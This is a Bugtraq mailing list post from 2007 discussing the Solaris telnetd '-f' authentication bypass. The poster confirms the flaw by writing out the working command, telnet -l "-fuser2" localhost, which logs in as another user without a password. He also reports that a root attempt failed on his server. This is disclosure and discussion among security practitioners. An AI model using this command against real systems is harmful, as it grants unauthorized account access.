Bugtraq mailing list archives
Re: Solaris telnet vulnberability - how many on your network?
From: Leandro Gelasi <leandro.gelasi () tiscali it>
Date: Wed, 14 Feb 2007 11:41:17 +0100
On Monday 12 February 2007 07:00, Gadi Evron wrote:
Update from HD Moore: "but this bug isnt -froot, its -fanythingbutroot =P"
Confirmed. If the server permits logins from outside (maybe via SSH only - protection provided by a local or network) and has telnetd enabled any user can login as other user with no password. I mean: $> ssh user1@sol10_server.dom password: ******** user1@sol10_server>telnet -l "-fuser2" localhost <no pass required> user2@sol10_server> On my Solaris 10 server I wasn't able to obtain root privileges this way, trying: $>telnet -l "-froot" localhost (or IP from the local net) I got: Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. Not on system console Connection to localhost closed by foreign host. It seems that root cannot login on not-system consoles. This server hosts SunRay Server Software 3.1, maybe the different configuration is coming from there. See you LG -- ************************************************************************** Leandro Gelasi email : leandro.gelasi () tiscali it Gilles Villeneuve will live forever **************************************************************************
Current thread:
- Re: Solaris telnet vulnberability - how many on your network?, (continued)
- Re: Solaris telnet vulnberability - how many on your network? Casper . Dik (Feb 13)
- Re: Solaris telnet vulnberability - how many on your network? Gadi Evron (Feb 13)
- Re: Solaris telnet vulnberability - how many on your network? Casper . Dik (Feb 13)
- Re: Solaris telnet vulnberability - how many on your network? Gadi Evron (Feb 13)
- Re: Solaris telnet vulnberability - how many on your network? Gadi Evron (Feb 13)
- Re: Solaris telnet vulnberability - how many on your network? Casper . Dik (Feb 13)
- Re: Solaris telnet vulnberability - how many on your network? Joe Shamblin (Feb 14)
- Re: Solaris telnet vulnberability - how many on your network? Casper . Dik (Feb 14)
- RE: [Full-disclosure] Solaris telnet vulnberability - how many onyour network? David Taylor (Feb 14)
- Re: Solaris telnet vulnberability - how many on your network? Darren Reed (Feb 15)
- Re: Solaris telnet vulnberability - how many on your network? Casper . Dik (Feb 13)
- RE: Re: Solaris telnet vulnberability - how many on your network? Roger A. Grimes (Feb 15)
- Re: Re: Solaris telnet vulnberability - how many on your network? jf (Feb 15)
- Re: Re: Solaris telnet vulnberability - how many on your network? Hugo van der Kooij (Feb 16)
- Re: Re: Re: Solaris telnet vulnberability - how many on your network? jf (Feb 16)
- Re: Solaris telnet vulnberability - how many on your network? Anthony R. Nemmer (Feb 16)